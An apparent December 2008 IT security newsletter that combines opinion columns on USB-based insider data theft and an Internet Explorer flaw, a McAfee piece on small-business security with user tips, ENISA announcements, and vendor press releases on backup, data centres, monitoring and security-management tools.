Perimeter Security

In today's world the perimeter to be secured is not just the immediate physical one of building walls, fences and borders.

by Michael Smith

While the Great Wall of China did something for that country by way of protection, and a good perimeter fence and watchtowers may guard and protect a military or similar installation, today, in the world of computers and the Internet, we must also and especially consider our virtual perimeter. This, in many cases, is rather fluid.

Many companies, institutions, and others place guards at their entrances, require passes of all kinds and levels, have fences, intruder sensors, and much more, despite the fact that they work on a rather international level, and have all manner of anti-virus protection and all manner of protection against intrusions, by way of firewalls and such. Yet few, so it would appear, have a policy in place to ensure that sensitive and mission-critical data is not taken out by employees, especially temporary or disgruntled staff, on removable media, from floppy discs (yes, I am showing my age here, for I even remember when they, in fact, were floppy and rather big as well) to CDs/DVDs, USB flash memory, or even small removable USB hard drives.

We all have seen what can happen – and I am sure we all wonder where that data that was thus lost is now – when the likes of the British government offices sent data, very sensitive data, unencrypted, around the country on CDs.

Apparently, the real problem is that the two departments concerned have different encryption tools and the receiving department would not have been able to read the data had the discs been encrypted. No one thought of those implications before? Doh?!?

This is very much like NATO, with all its different kinds of weapons and even communications systems, all of which could really have caused a great deal of trouble had we ever had to go to war with the Warsaw Pact in those days. Unlike us, they had everything interchangeable. Proper compatibility should have been thought of, one would have thought, but it does not seem to be thus. But, alas, those that sit in ivory towers.

Encryption is but one thing.

That, however, which often – more often than not – gets forgotten as far as securing data is concerned is the “physical” security of it and securing the ports – not the shipping kind though.

Who has access to the USB ports and do they need to be able to remove data by downloading it on removable media?

Organizations go to all lengths to control access to a network from the outside but often have no policy and measures in place for securing the devices. This means that basically anyone can steal sensitive data by using a USB memory stick, for instance, or an iPod.

The question to ask is who in an organization has access that could compromise data, as this could be more important than the possibility of an external breach and resultant data theft.

Too often only the “break in” from the outside into the system is considered as far as data and security are concerned, and the possibility of data theft from within an organization by an employee is often overlooked.

Today flash memory devices are getting smaller and smaller, are being “concealed” in other objects such as pens, and are getting more powerful with ever more data storage capacity. Plugging in a USB stick and copying a large amount of data takes only from some seconds to something like ten minutes. USB sticks are nowadays so common and, in fact, so much a part of work that the fact that someone has one or more on his or her person says and means nothing to the security guards, for instance. Hence the protection has to be at a different level.

Music players too, such as an iPod or a similar straightforward MP3 player, can often store data aside from just music files and are therefore also a way in which data can leave your institution; a way in which someone can take out data who, maybe, should not be able to.

Also, such devices, whether players or memory sticks and suchlike, can be used by someone with malicious intent, whether employee or not, to inject malware into a PC or an entire network. All it needs is access to a computer that is not locked down, for instance.

It would appear that many organizations do not have any systems and policy in place that control who may access and especially copy data to removable media of whatever kind.

All it takes, as we have seen more than once, is a disgruntled employee – or even an ex-employee whose password and such is still active – to ruin the reputation of an organization or to hold it to ransom.

© M Smith (Veshengro), December 2008

Does size matter? When it comes to security, the answer is yes?

Why SMBs face the same security risk as larger businesses. McAfee explains…

By Greg Day, Security Analyst, McAfee International Ltd

Europe’s 19 million small and medium-sized businesses (SMBs) are operating in an increasingly competitive environment. They are becoming more and more reliant on technology to conduct business and remain competitive. As a result cyber criminals are shifting their focus to target SMBs, as illustrated by a recent survey by the GetSafeOnline initiative showing that 44 per cent of SMBs have been attacked.

The result of these attacks can be catastrophic to small businesses. Viruses, hacker intrusions, spyware and spam can result in a number of damaging consequences such as lost or stolen data, computer downtime, decreased productivity, compliance issues, lost sales and even loss of reputation. These types of effects can be damaging to any size business, but in particular an SMB, which has limited technical staff, restricted security budget and fewer backup support options meaning the business could be crippled by any of these attacks.

But worryingly, the general consensus among the small business community in Europe is that they are just too small to be of any value to cyber criminals; 56% don't even think they could make cyber criminals money. As well as being naïve about the potential value they can offer to hackers, as many as 90% think they are adequately protected when it comes to IT security. This is a dangerous misconception, and SMBs need to understand why they are at risk, how best to protect their business, and how to raise IT security up the company's priority list.

This is of course a huge challenge for SMBs to address. As a security expert McAfee understands that fighting viruses, malicious code and fending off phishing (or even SMSishing) attacks is a full time job. It’s a challenge and it’s difficult to find time in the day to dedicate to this especially when the business is battling with limited resources and budget.

McAfee conducted the ‘Does Size Matter?’ research report to identify to what extent European SMBs are actually at risk and to assess how much time and effort is spent on maintaining security protection. The survey found that on average SMBs have just one hour a week to dedicate to IT security. Whilst this is understandable given the challenges that smaller businesses have to face, something needs to be done to address this balance.

It is unrealistic to expect small businesses to re-direct huge amounts of budget or time into the area of IT security so how best can SMBs address this issue? Firstly it is important to implement the right technology. It can be a confusing process navigating the security product landscape but by implementing a managed security product, SMBs have that pressure removed and can be confident they are receiving the right protection.

Secondly, as well as implementing the right technology there are a number of steps that SMBs can take in terms of education to ensure the business remains protected and truly does go under the radar of cyber criminals. These range from deleting emails from unknown sources, not opening attachments, as well as backing up files and keeping sensitive information such as credit card details protected. Education is key and can go a long way in terms of minimising risk.

The research proves that SMBs are as much at risk as larger enterprises and it is important for business leaders to be made aware now so steps can be put in place before the business is lost as a result of an attack. Hackers can make money out of any size business and as SMBs increasingly become digitalised and dependent on technology, this will become an even bigger problem.

Tips for protecting your systems from hackers and viruses:
1. Never open email attachments or download files from unknown sources
2. Beware of unknown emails with vague subject lines e.g. “document” or “re:document” – they could be a virus. Avoid opening email attachments when the subject line is suspicious even if it appears to come from a friend or someone you know. When downloading files from the Internet, make sure that the source is a legitimate and reputable one
3. Delete chain emails and junk email. Do not forward or reply to any of them. These types of email are considered spam, unsolicited mail that may contain viruses
4. Keep your anti-virus updated. There are over 80,000 known viruses and 500 new ones appear every month. Use anti-virus software and services that regularly update current virus information and its scanning engine
5. Back up your files. A virus can destroy your files. Make sure you back up your files regularly and keep your backup copy in a separate location from your work files, preferably not on your PC hard drive
6. Ensure your computer’s operating system is up to date by visiting the manufacturer’s website (e.g. Microsoft)
7. Never enter your credit card or password details unless you are sure the site is real / protected

McAfee International Ltd is exhibiting at Infosecurity Europe 2009, Europe’s number one dedicated Information security event. Now in its 14th year, the show continues to provide an unrivalled education programme, the most diverse range of new products & services from over 300 exhibitors and 12,000 visitors from every segment of the industry. Held on the 28th – 30th April 2009 in Earls Court, London this is a must attend event for all professionals involved in Information Security. www.infosec.co.uk

New Software-as-a-Service approach to Capacity Management for SMEs

Milan, December 2008 - Neptuny, a leading solution provider in performance optimization for IT, introduces Caplan™ SaaS (Software-as-a-Service), to provide efficient Capacity Management also for Small to Medium-sized Enterprises who want to set up a small-scale Capacity Planning and Management project.

Caplan™ is able to cover multiple domains in one single solution, while having zero impact in production environments thanks to its agent-less architecture, its out-of-the-box integration with major management platforms and tools, and the ability to easily integrate custom data sources. It is the most feature-rich and mature solution available in the market, providing advanced analyses, forecasting and reporting capabilities by means of easy-to-use web interfaces and dashboards. Caplan™'s capability to align IT resources and business initiatives facilitates realization of the real value of IT investments.

Neptuny’s Caplan™ SaaS provides all the benefits of the standard edition of Caplan™ and enables organizations to benefit from the same powerful features without any infrastructure and maintenance cost. It is the first Capacity Management solution available on the market that complies with the Software-as-a-Service paradigm. Caplan™ SaaS provides a faster time-to-value and allows customers to better align their Capacity Management process to their needs.

According to Butler Group, Caplan™ SaaS “is a perfect fit for Small to Medium-sized Enterprises (SMEs) wanting to undertake a small-scale capacity planning and management exercise, and could also aid mid-sized organisations in their short-term capacity planning needs. ... The SaaS model can also be used as a Proof of Concept (PoC) for customers wanting to undertake a large deployment exercise.”

Fabio Violante, Neptuny CEO, commented “We at Neptuny believe that our SaaS proposal for Capacity Management will enable us to help Small to Medium-sized enterprises with a short-term, small-scale project to leverage to easily get the benefits provided by Caplan™”.

Caplan™ SaaS - Key Features
· High-availability service with no setup and maintenance costs: Caplan™ SaaS infrastructure is hosted in a high-availability data centre. Caplan™ SaaS does not require new hardware to be installed at the customer site. All maintenance activities are guaranteed directly by Neptuny’s support (24x7). Customers do not have to manage the database and other components of the system, the service is upgraded automatically, and no ongoing maintenance effort or costs are required once the service starts.
· Secure and easy-to-use web interface: Caplan™ SaaS is accessible from the Internet. All user functionalities are accessible via a web interface structured to enable the entire lifecycle of the Capacity Management process (e.g. data gathering, analysis, model building and reporting); access to data and functionalities can be restricted by means of Access Control Lists in order to assign roles according to user responsibilities. Data and access security are guaranteed by SSL encrypted communications.
· Flexible Service: Users can subscribe to Caplan™ SaaS for a variable period of time (e.g. 6 months), at the end of which the service is renewable for additional periods. Caplan™ SaaS allows customers to lower costs. Users are allowed to subscribe to a service tailored to their needs in terms of number and type of items (e.g. virtual server, storage arrays, mainframe, ...) and functionalities (forecasting, predictive monitoring, by exception reporting, ...); they are enabled to implement a capacity management process with the right level of maturity and evolve it according to their organization's changes.

Neptuny is a leading Solution Provider in performance optimization for both IT and Digital Media. For more than a decade, Neptuny expertise and technologies have been crucial in helping customers in different industries (Telco, Banking, Insurance, etc.) to improve the business outcome of their infrastructures and services. Neptuny solutions have been proven to provide sensational ROI by means of optimization and capacity management initiatives.

Please find more information on Neptuny and Caplan™ at www.neptuny.com.

Source: Darshna Kamani, Eskenzi PR Ltd

Access everywhere - secure nowhere? EU-Agency ENISA launches Position Paper on mobile eID security issues

Mobile eID - for better or for worse? Your mobile is fast becoming your new PC, wallet, identity card, but is it secure? The EU Agency ENISA (the European Network and Information Security Agency) launches a Position Paper on authentication issues for mobile

In the near future, we will pay our taxes, buy metro tickets or open bank accounts over our phone. Mobile devices, national ID-cards, smart phones and Personal Digital Assistants (PDAs) will play an ever more important role in the digital environment. The mobile devices can act as an identity or payment card for online services. In Asia, there is already a growing demand for these services, particularly in Hong Kong, Singapore and Taiwan. The main driver in Asia is consumer interest in convenient, easy solutions, in as few devices as possible. In Europe, by contrast, the main driver is enhanced security, with the mobile phone seen as a security identification tool, for example in electronic ticketing, payment and even online banking.

But the use of mobile devices also brings new security and privacy risks. A user may continuously leave traces of their identity and transactions, even by only carrying the device in their pocket. There is an increase in stolen mobile devices containing key personal user information. Although secure components (based on smart card technology) exist, due to increasing complexity, mobile devices are now prone to attacks which before applied only to desktop PCs. Among the top ten "e-Threats" in 2008, BitDefender lists exploitation of mobile device vulnerabilities three times. The "E-Threats Landscape Report" tells us that mobile devices are increasingly targeted by new generations of viruses because of their permanent connectivity and the increasing use of SMS scams. Therefore, seeing mobiles only as personal, trusted and trustworthy devices should be approached with care. The Executive Director of ENISA, Mr Andrea Pirotti, observes:

'New services and opportunities are being developed which many users will find beneficial in their daily life. We strongly believe that if these new technologies are applied the right way, they also constitute a big opportunity for secure, sophisticated authentication mechanisms vital to future applications and services.'

The ENISA Position Paper is available at:
http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_mobile_eid.pdf

Have your say! To influence the future of European Network and Information Security: please give your opinion in the online public consultation:
http://ec.europa.eu/yourvoice/ipm/forms/dispatch?form=InfsoNis

Source: ENISA - European Network and Information Security Agency

The Scandinavian approach to Awareness Raising: ENISA survey reveals how 100 European Local Governments 'can do more'

The EU Agency ENISA presents the results of a survey of 100 Scandinavian local governments' data management efforts within health, hospital, regional development, education and public transportation services

One of the most common privacy infringements is wrongful access to a patient's sensitive data. Health care services, hospitals, public transport and education systems at regional and municipal level alike all handle personal data, with inherent risks. The study portrays how 110 regions and municipalities, responsible for the services above in the three Scandinavian countries, Denmark, Norway and Sweden, are working on the secure management of such information. The conclusion is that not enough attention is paid to raising awareness among staff, but generally the authorities do well in terms of technical systems and policies.

A total of 110 public bodies (of which 97 were municipalities and 13 regions) responded to a 54-question survey. The responses are consolidated and analyzed in a Scandinavian perspective. The survey focused on four areas: 1. Managing IT Risks, 2. Information Security Management, 3. Policy Enforcement, 4. Awareness Management - securing employee compliance and attention to policies, roles and responsibilities. Overall, the survey shows that the bodies have focused on: 1. Risks, 2. Goals for information security (policy), 3. Creating a framework for information security management. 4. With regard to staff awareness, the survey confirms that:

- Rights, obligations and sanctions are typically described by the bodies
- Staff is to some extent given access to security rules
- Little is done to provide knowledge through further training
- Knowledge of rules is rarely followed-up
- Undesired behaviour is rarely followed-up

The Executive Director of ENISA, Mr. Andrea Pirotti, observed: "This report underlines the fact that staff must first be aware of a) what data has to be protected and b) why, if they are to comply with security rules. The situation is good, but not good enough: more still has to be done."

The report is the result of the kind support by the ENISA Awareness Raising (AR) Community.

For further information: http://www.enisa.europa.eu/

Source: ENISA - European Network and Information Security Agency

ProDefence Releases Enterprise Software Solution for VMware Virtual Server Backups

iBac VIP Simplifies ESX Server and Virtual Machine Backup

Worthing—December 2008—ProDefence, a UK distributor of eSecurity products and services across the UK and Ireland, announced today that they will be launching an enterprise backup solution for VMware virtual servers. iBac Virtual Infrastructure Proxy (iBac VIP) is designed and manufactured by Idealstor, leaders in removable disk-to-disk backup solutions to offer an easy to use and affordable solution for backing up data in a VMware virtual server.

iBac VIP has been written from the ground up with VMware backup in mind and is designed specifically for VMware virtual machines running in an ESX server environment. VIP is licensed per ESX server regardless of the number of virtual machines or processors running on the ESX server. This enables companies to quickly add new VMs without having to worry about purchasing additional backup agents for each virtual server.

iBac VIP ties into the VCB framework provided by VMware. Because of this, the load from running backups is removed from the ESX server and offloaded to a dedicated 2003 backup server. This ensures that backups will not put a large load on the ESX server, which can affect the performance of virtual machines. VIP can back up data residing on a fibre channel or iSCSI SAN or can back up data directly from the ESX server over the LAN. VIP offers a simple user interface that provides scheduling, logging, email reporting and the ability to back up multiple ESX servers on the LAN or in remote data centers.

Because iBac VIP is designed to run on a Windows 2003 Server, VIP can be tightly integrated into Idealstor’s range of removable disk backup solutions. This enables VIP jobs to be sent straight to the Idealstor removable drive bays which can then be sent offsite in place of tape for offsite storage and disaster recovery. While it is not required to use Idealstor equipment as the VIP proxy server, the Idealstor Backup Appliance comes pre-loaded with Windows 2003 Server enabling this one solution to eliminate the need of having to use a separate server, tape library and backup software to backup VMware virtual machines.

“iBac was originally released in 2005 with the goal of offering an easy to use yet robust backup application for Windows servers”, said Ross Holmes, Sales Manager of ProDefence, the UK-based distributor of Idealstor. “Over the years our clients have increasingly migrated to VMware and reached out to us to help them with their virtual server backups. Rather than Idealstor simply modifying their existing software for use with VMware like most software companies have done, they have developed VIP from the ground up with the unique requirements of VMware in mind. Because VIP is licensed per ESX server, licensing is less complicated and is far more affordable than having to purchase expensive and resource consuming backup agents for each VM.”

ProDefence is a UK distributor of eSecurity products and services throughout the UK and Ireland. ProDefence offers the highest level of account management and technical support within the security channel. www.prodefence.co.uk

Idealstor manufactures removable/ejectable disk backup systems that are designed to augment or completely replace tape as backup and offsite storage media. The Idealstor Backup Appliance has been on the market for over 5 years offering a fast, reliable and portable alternative to tape based backup systems. Each Idealstor system uses industry standard SATA disk as the target for backup data and as offsite media. Systems range from 1 removable drive up to 8 and can be used by a range of businesses from SMB to corporate data centers. Disk capacities mirror that of the major SATA manufacturers. Uncompressed capacities of 200GB, 320GB, 400GB, 500GB, 750GB, 1TB and 1.5TB are currently available.

Source: Yvonne Eskenzi - PR for ProDefence

Interxion to Expand Brussels Data Centre

Interxion, a leading European operator of carrier-neutral data centres, today announced significant expansion plans for its data centre in Zaventem, Brussels. In response to growing demand for the company’s infrastructure and services, the amount of equipped space will be expanded by 2,200 m², effectively doubling the facility’s size. The first phase of the new space is scheduled to be operational in February 2009.

The new space will offer redundant power and N+1 cooling, as well as the most advanced alarm and monitoring systems. It will support both standard and high density power configurations, and has been designed using Interxion’s energy efficient modular architecture, with free cooling and maximum-efficiency components as standard.

“The new expansion is a logical response to the high levels of demand we are experiencing in the Belgian market,” explained Jo Mariens, Managing Director of Interxion Belgium.

“Customers who sign in for the new space will benefit from the central location of our data centre, high security, a robust power supply and a wide range of connectivity options including peering opportunities with the popular BNIX internet exchange.”

Interxion is a leading European operator of carrier-neutral data centres. Headquartered in Schiphol-Rijk, The Netherlands, Interxion serves its customers from 24 carrier-neutral data centres located in 13 cities across 11 European countries. Interxion serves network and carrier-based, hosting and enterprise customers who require professionally managed and strictly controlled physical environments within which to operate mission-critical applications and computer systems. Interxion’s data centres offer cost-effective and fast access to multiple local and global communication networks.

For more information please visit www.interxion.com

Source: Spreckley Partners Ltd

Brocade Network Monitoring Service Improves Data Availability and Efficiency

Provides Customers a Secure, Highly Reliable Remote Monitoring, Alerting, and Reporting Service for Their Data Centre Fabrics—Optimising Resources and Enabling Infrastructure Growth without Hiring

Brocade® has announced the next-generation Brocade Network Monitoring Service (NMS), which provides organisations with an end-to-end remote monitoring, alerting, and reporting service for their data centre fabrics. Brocade NMS now provides 24×7 expert end-to-end monitoring of the health and status of data centre fabrics to help maximise network efficiency, availability, and uptime. Moreover, Brocade NMS provides organisations with valuable information and rules-based business intelligence to maximise application availability and optimise data centre resources. Through this service, IT organisations can better manage growing and increasingly complex data centre infrastructures with their current staff.

“Managed services are one of the fastest-growing segments of the storage services market,” said Gartner Storage Services Principal Analyst Adam Couture. “Gartner anticipates that in a weakened economy this should accelerate as IT departments are asked to do more with less and may have headcounts frozen or even reduced.”

According to Gartner’s 2008 CIO survey, business intelligence is a top technology priority. Brocade NMS helps fulfil that need by providing deeper business intelligence, enabling organisations to make faster and more-informed decisions. Brocade NMS does this by integrating expertise from knowledgeable storage and networking professionals with a comprehensive monitoring approach, advanced event management, and predictive diagnostic techniques. This integration can help reduce overall problem resolution time by almost one hour per event, resulting in decreased downtime costs and increased productivity to subscribers.

In addition to 24×7 monitoring, Brocade NMS collects and analyses a wide variety of performance, utilisation, and throughput data. Real-time alerts warn administrators of networking issues, bottlenecks, or potential system outages, thereby enabling proactive action to minimise or avoid an impact to application performance and availability. Real-time and historical data and flexible reports are generated automatically and are available via a secure Web portal. As a result, organisations can analyse historical trends, optimise resource utilisation and cost-effectively plan future capacity.

New features of Brocade NMS include:
· Expanded monitoring and reporting from extension devices into the data centre across all Brocade products and many third-party products, creating an end-to-end view of the data centre fabric.

· A flexible new architecture that enables policy-based monitoring, event correlation, and “yellow light” alerts to increase business intelligence and enable a more proactive approach.

· An infrastructure that provides faster, more reliable access, as well as enhanced security. An enhanced reporting platform provides real-time and historical performance information along with flexible, customisable reports and data views to meet specific requirements.

· More precise fault determination across the data centre fabric for faster resolution and increased ability to meet application SLAs.

“The newly enhanced Brocade NMS helps customers get the most value from their data centre network investments and ensures that under-staffed IT resources can focus on the business,” said Hugues Meyrath, Vice President and General Manager of Brocade Global Services. “Through constant monitoring and reporting, Brocade NMS helps ensure that our customers’ data centre networks are running optimally and that applications and data are readily available to users.”

Brocade is a leading provider of data center networking solutions that help organizations connect, share, and manage their information in the most efficient manner. Organizations that use Brocade products and services are better able to optimize their IT infrastructures and ensure compliant data management. For more information, visit the Brocade Web site at www.brocade.com or contact the company at info@brocade.com.

For more information visit www.brocade.com/nms

Source: Spreckley Partners

Major flaw revealed in Internet Explorer; users urged to switch

Yet another problem with IE - oh dear!

by Michael Smith

A major new security flaw that affects all versions of Internet Explorer from IE5 to the latest beta of IE8 has been discovered. The attack has serious and far-reaching ramifications – and they are, so we understand, not just theoretical attacks. This flaw, in fact, is already in wide use as a tool to steal online game passwords, with some 10,000 websites infected with the code needed to take advantage of the hole in IE.

Virtually all security experts – and that includes us at ICT Review – are counseling and encouraging users to switch to any other web browser, such as Firefox, Chrome, or Opera; none of the others are affected. Do so at least for the time being, though Microsoft has stubbornly said it "cannot recommend people switch due to this one flaw." How could and would they recommend anyone to switch anyway and anyhow? They want people to use their faulty products, same as with the software in general. In addition to that, their websites – many of them anyway – in the Windows Live department do seem to have problems rendering properly in other browsers. No surprise there on either count.

Microsoft adds that it is working on a fix but has offered no estimated times on when that might happen and be ready to be released on the unsuspecting public. Meanwhile it offers some suggestions for a temporary patch, including setting your Internet security zone settings to "high" and offering some complicated workarounds.

Some reports state, however, that none of those fixes actually work, and that also does not surprise me after the fiasco with a patch that screwed up the workings of a number of encrypted USB drives, such as Cruzer Enterprise, and the hotfix to fix this not fixing anything at all.

It is most essential that the flaw be patched immediately, but as a patch does not appear to be forthcoming in the very near future there is but one piece of advice that one can give: change your browser NOW. Get Firefox.

Security pros fear that the attack will soon spread beyond the theft of gaming passwords and into more criminal arenas, of which there can be no doubt, as the malicious code can be placed on any website and can be adapted to steal any password stored or entered using the browser.

Now it is very much down to the issue of time: Will Microsoft repair the problem and distribute a patch quickly enough to head off the tsunami of fraud that's about to hit or will it come too late to do any good?

Meanwhile, one can but reiterate the advice and recommendation: Switch from Internet Explorer as soon as you can. You can always switch back once the threat is eliminated, as you need not uninstall Internet Explorer. Just do not use it for the present time.

I can also nigh on guarantee that once you have experienced the likes of Firefox browser and the security that it offers, especially with the add-ons that are available – ensure though that you only download and install add-ons that are from the Mozilla website and not from any others. Those from the Mozilla sites are guaranteed to work and free of malware.

© M Smith (Veshengro), December 2008
<>

Security Management

Author: phion AG

Managing similarities
Web-based business processes are nowadays part and parcel of day-to-day operations in most companies, while networking marches on triumphantly. An ever-increasing number of sites, including even the smallest field office, are being integrated into communication infrastructures so that they can enjoy the benefits of centralised availability of data, simple application deployment and seamless workflows. The upshot for users is that it makes their job easier, and for companies, it boosts productivity. However on the downside it means a task that security and network managers can barely cope with as a result of the explosion in the number of systems requiring support for a whole variety of ‘behind-the-scenes’ tasks.

Companies and managed security providers have inevitably accepted the fact that the number of security gateways increases with every new site and customer. But setting up, configuring and the ongoing operation of these countless systems with their complicated interactions are creating a huge management effort. As a result this casts doubt over the systems’ efficiency on the one hand, while having a negative impact on their smooth operation on the other, given that where a great deal of management is required there is also a greater scope for error. This situation is then aggravated by the number of connectivity and WAN optimisation systems, which are also growing, as well as by other devices which populate networks in addition to security gateways. They all perform special tasks and are not, strictly speaking, part of IT security, but they still must integrate seamlessly with the entire system concept.

Achieving a dramatic reduction in complexity
It has obviously not escaped the notice of security providers that the complexity of security infrastructures is gradually assuming nightmare proportions. Using enhanced interfaces and simplified operational concepts for these security gateways should make it more efficient to manage these systems, but this is simply not enough in most cases. How easy an individual gateway is to install and maintain does not come into it any more. In any case the sheer number of systems requires a huge investment in time and staff. The issue of integrating adjacent technologies will not even be touched, let alone solved by providing gateways with a more attractive management interface.

A radical approach is needed to enable companies to manage their infrastructure efficiently not just in the short term but in the future as well. In this case there are various courses of action available for permanently reducing the complexity of the task to a manageable level, while also ensuring the system’s efficient operation. The first option is to manage security gateways in a smarter way, leveraging the similarities that systems have, thereby reducing the administrative effort. One step that is just as important is to enable technologies which have been separate to converge as part of a small number of systems administered centrally. In addition, 100% traceability must be guaranteed for changes made to the infrastructure, as a lack of transparency is one of the biggest causes of errors and avoidable effort.

Managing similarities
The following simple example clearly highlights the crux of security management. If a new housing estate is built, all the houses will initially be identical in terms of décor and the materials used etc. In this situation it is obviously very easy to make sweeping decisions on how to expand the estate further. But as soon as tenants move in, specific adaptations will be made sooner or later. Implementing extensive measures affecting the whole estate now requires a significantly higher degree of planning. However, the individual apartments are basically not that different from each other and you will be able to find more far-reaching similarities in many areas. But if these similarities are ignored all the apartments will have to be considered as individual, completely different units. On the other hand, the common features they have are no longer enough to be able to treat all the apartments in the same way.

Why does this management of similarities remain an unresolved problem for many security product manufacturers, even though the potential for improvement is obvious? The answer to this is based on the underlying management concepts. Traditional approaches mainly involve either profile-based or device-based management. Profile-based management is ideal for managing a large number of identical gateways. However, it takes some effort to map individual features for each system. In total contrast, device-based management focuses completely on the specific features of the individual devices, but it is not conducive at all to the efficient management of a large number of systems.

Consequently, the ideal solution can only be achieved through combining profile-based management with device-based management, exactly in the way being publicised by phion for instance. Given the fact that phion is a relatively new company, this Austrian solution provider is not encumbered by legacy technologies and so it was able to develop a management concept that is radically different from traditional approaches. Firstly, it allows you to map individual requirements on the gateways, while at the same time supporting efficient, comprehensive management of common features. As a result, the benefits of profile-based and device-based management have been combined and the disadvantages avoided.

Security technology convergence
Being able to manage similarities between security gateways more efficiently is a necessary fundamental step, but only the first one. Company networks are teeming with countless other devices, ranging from routers and switches to WAN optimisers and traffic intelligence systems. The use of all these devices is undoubtedly justified, but their complex interactions hinder the introduction of comprehensive work processes and devour the majority of the IT department’s capacity.

In view of this situation, the trend within security technology is clearly shifting towards convergence. This means that technologies which are adjacent and logically complement each other are being integrated into solutions and comprehensive management concepts. This obviously includes first and foremost security and high availability functions. But elements such as traffic intelligence and WAN optimisation should not be disregarded either, especially with the ongoing process of adding subsidiary offices to networks. Traffic intelligence ensures that communication links are not disrupted even if lines are disconnected and that important data traffic always reaches its destination. WAN optimisation, on the other hand, guarantees that the volume of data traffic is kept as low as possible using different procedures in order to speed up response times.

This is why netfence gateways have combined security with high availability and traffic intelligence from the very start. Integrating additional WOC functionality offers companies the chance to provide their subsidiaries with security and reliable communication in a single rollout process, as well as to administer their infrastructure using a single central management approach.

Summary
Nowadays, the efficiency of the entire security infrastructure is determined more than ever by how efficiently it is managed, both from a financial and functional perspective. But this alone is not enough. Only if the key adjacent technologies also converge in the security solutions deployed can the entire infrastructure be managed sensibly in financial and technical terms.

Recycle the CISO – the possibilities are endless

London, UK – 15th December 2008 - Gerry O'Neill, a senior contributor to the Infosecurity Adviser - the online community for the information security industry, created by the organisers of Infosecurity Europe – notes that never before have there been so many vacancies in the CISO community.

Gerry O’Neill says that it is now clear that the current economic downturn is having an effect on the employment of IT security professionals, with several redundancies already noted. There is an opportunity and companies should take advantage of the wealth of IT security talent currently available in the IT security managerial sector.

"What we are seeing is a record number of vacancies in the IT security sector, most notably on the CISO - Chief Information Security Officer - side of things. We're therefore encouraging organisations to widen their search and consider employing from the wider pool of equally competent and available accredited security professionals with proven ability," said Gerry O'Neill, CEO of IISP.

According to O'Neill, the fact that a large number of CISO roles now on the job market are being offered to a limited group could be seen as a short-sighted tactic, when they are missing the opportunity to cast the net more widely.

"Not only does this recruitment strategy deprive companies of their best options for senior IT security professionals, but it will create a shortage of CISOs in the market in the longer term. This is a lose - lose situation that can easily be avoided," he added.

"It is also evident that there have also been some redundancies, which is a short-sighted move by employers. The fact is that in a downturn criminals will be seeking out fraud and espionage opportunities, sometimes with the help of disgruntled employees who are about to lose their jobs. This is not the time to remove the staff who survey the security and governance landscape acting as an organisation's key defence. Now is the time when all organisations should be strengthening their safety net, particularly when all the predictions are that cyber criminal activity will increase dramatically in 2009," he said.

For more on Gerry O'Neill's CISO comments: http://www.infosecurityadviser.com/view_message?id=84

For more on Infosecurity Adviser: http://www.infosecurityadviser.com/home

by Neil Stinchcombe – InfosecurityPR
<>

Seeing the administrator as a user

Usability of administration tools often leaves a lot to be desired

by Dr. Klaus Gheri, CTO phion

In general, administrators are very enthusiastic about technology and are definitely not fazed by code and scripts. However, the fact that administrators are technically literate users is too often used as a poor excuse by software developers for offering administration tools that are seldom appealing and user-friendly. Administrators are, after all, people too. They respond just as positively to an improvement in ergonomic function as any Office user just a few offices along the corridor. Confusing GUIs with too much or even wrong information hamper efficiency, while unnecessarily long-winded and complicated work processes detract from job satisfaction. This can even result in security risks.

Unlike ordinary users, administrators require detailed technical information to enable them to carry out routine analyses or look into faults in the environment where the products are being used. This means that administration tools must be designed so that, on the one hand, they can present dense information in a clear, concise manner, while also allowing access to details and settings with just a couple of mouse-clicks. The ideal scenario is that based on the Pareto principle, 80-90% of all troubleshooting actions can be carried out quickly, without having to spend ages trawling through log files.

Getting to grips with the system’s inner workings
At the moment, most network administration centres are nowhere near achieving this situation. An administrator’s daily work typically involves using tools offering a variety of functions, but which can only handle operational activities to a limited extent. They force administrators to exit frequently from the GUI, and only for trivial reasons, such as to use a capture tool (e.g. Tcpdump) to record certain network activities on the system or to get involved in the inner workings of the system via the system console, which can, as is well known, end in grief.

If we look at the typical interaction administrators have with their system tools, we can clearly see three basic, effort-intensive areas of activity:

1. Systems operation, diagnostics and troubleshooting
2. Reporting
3. Configuration and lifecycle management.

The first area, systems operation, diagnostics and troubleshooting, is the one where companies generally expend the most effort. In this case, using smart tools to reduce the number of steps involved improves the administrator’s lot, thereby cutting costs and boosting productivity in the company, as resolving problems in particular can now be carried out more efficiently.

In practice, providing administrators with an information architecture which allows them to get down to the required information level quickly has proved to be a success. This concept should be applied in the GUI in the form of the following items:

a) Real-time status information – this is required to provide a quick overview of the current system activities going on. One key aspect in terms of making it user-friendly is to provide a simple option for setting filters. This will allow administrators to decide in a rough manner what is of interest to them.

b) Apart from providing real-time status, a cumulative short history of activities has also been helpful. It provides another higher level of abstraction than the log file analysis and makes it possible in many cases to quickly say: “The client never accessed the gateway” or even “Access was refused because the password was wrong”.

c) As administrators do not always want to be stuck in front of the console, there should be some way for important messages to reach them. Eventing is a form of active log where it is important that the delivery of event messages can be configured in a flexible manner. For instance, administrators can indicate the urgency of a problem using visual warnings on screen and acoustic warning signals on the computer. In even more urgent cases, they could send a message via SMS to the mobile. The administrator can adapt the process to the team’s usual way of working so that any incident will be dealt with in a sufficiently prompt manner.

d) Statistics and graphs are a fourth level which can be used to help people gain a better understanding of what is going on. A picture does not always say more than a thousand words, but it always says more than a long column of figures. In this case, it is important to focus on the fact that visual representations are available in real time to support time-critical analyses.

e) Finally, the log file is the last level of analysis where the other options are no longer of any use. But this does not mark the point where the concept of usability reaches its limits. A functionally rich viewer should be used to speed up the analysis of log files, especially one offering flexible filter options. Otherwise, it takes a huge amount of time working through the large quantity of data in the log files.

The statistics and graphs mentioned above already cover many of the typical reporting requirements, the second area referred to above. If administration tools make it possible to display all current parameters graphically and a fully centralised management console collates all the information from the individual components, very large parts of the reporting task can be automated.

As far as the third area is concerned, configuration and lifecycle management, it is essential that there is also an administration tool really capable of covering the entire scope of the configuration. This places a great demand on the systems’ architecture as the benefits of easy management cannot be added on whenever it suits afterwards. Manufacturers must include these benefits in their plans right from the outset during product development, based on a bottom-up principle. In contrast to this, administrators are often faced with an umbrella-type management that has evolved over the years where every management feature is integrated individually, but only relates to a partial aspect of the system, for instance, the set of rules for firewalls, but not for the rest of the system configuration.

In addition, administrators can use management concepts which can facilitate their everyday work, such as object orientation and a good user interface. Object orientation improves the configuration’s consistency and can help speed up immensely the task of making changes to the configuration. For example, IP addresses or networks can be used as objects with meaningful names in configuration files. When the object’s content is modified this applies to every instance where it has been referred to.

